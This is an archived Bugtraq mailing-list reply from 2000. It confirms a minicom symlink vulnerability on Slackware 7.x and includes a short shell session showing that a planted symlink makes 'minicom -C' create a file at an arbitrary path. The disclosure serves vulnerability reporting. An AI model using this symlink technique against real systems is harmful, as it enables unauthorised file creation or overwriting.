[16462] in bugtraq
Re: RH 6.1 / 6.2 minicom vulnerability
daemon@ATHENA.MIT.EDU (Ben Lull)
Thu Aug 31 05:30:07 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------92C58B3C72141250EAD7123F"
Message-Id: <39ADA0E1.2E38DE96@valleylocal.com>
Date: Wed, 30 Aug 2000 17:03:45 -0700
Reply-To: blull@valleylocal.com
From: Ben Lull <blull@VALLEYLOCAL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
--------------92C58B3C72141250EAD7123F
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sylvain Robitaille wrote:
> Ben Lull wrote:
>
> > ... Yep Slackware (7.x) too using minicom 1.82 and 1.82.1
>
> One thing Ben's example didn't show is confirmation that this problem
> follows symlinks on his system, and creates the file accoring to the
> umask, which I've found to be the case on mine:
/* snip */
And the confirmation on Slackware 7.x using minicom 1.82 and 1.82.1...
Slackware 7.0
me@technolust> ln -s /tmp/foo .
me@technolust> ls -al /tmp/foo
ls: /tmp/foo: No such file or directory
me@technolust> (umask 2; minicom -C foo)
minicom: cannot open /dev/ttyS1: Permission denied
me@technolust> ls -al /tmp/foo
-rw-rw-r-- 1 me uucp 0 Aug 30 16:49 /tmp/foo
Slackware 7.1
me@mos> ln -s /tmp/foo .
me@mos> ls -al /tmp/foo
ls: /tmp/foo: No such file or directory
me@mos> (umask 2; minicom -C foo)
minicom: cannot open /dev/ttyS1: Permission denied
me@mos> ls -al /tmp/foo
-rw-rw-r-- 1 me uucp 0 Aug 30 16:46 /tmp/foo
Thanks,
Ben Lull
***
* Ben Lull
* Valley Local Internet, Inc
* Systems Administrator
***
--------------92C58B3C72141250EAD7123F
Content-Type: text/x-vcard; charset=us-ascii;
name="blull.vcf"
Content-Transfer-Encoding: 7bit
Content-Description: Card for Ben Lull
Content-Disposition: attachment;
filename="blull.vcf"
begin:vcard
n:Lull;Ben
tel;pager:6027037120@voicestream.net
tel;cell:(602) 703-7120
tel;fax:(602) 493.3312
tel;home:(unlisted)
tel;work:(602) 493.7120
x-mozilla-html:FALSE
url:http://www.skunkware.org
org:Valley Local Internet, Inc.;Information Technology
adr:;;14620 N. Cave Creek Rd.;Phoenix;AZ;85022;United States of America
version:2.1
email;internet:blull@valleylocal.com
title:Systems Administrator
x-mozilla-cpt:;5728
fn:Ben Lull
end:vcard
--------------92C58B3C72141250EAD7123F--
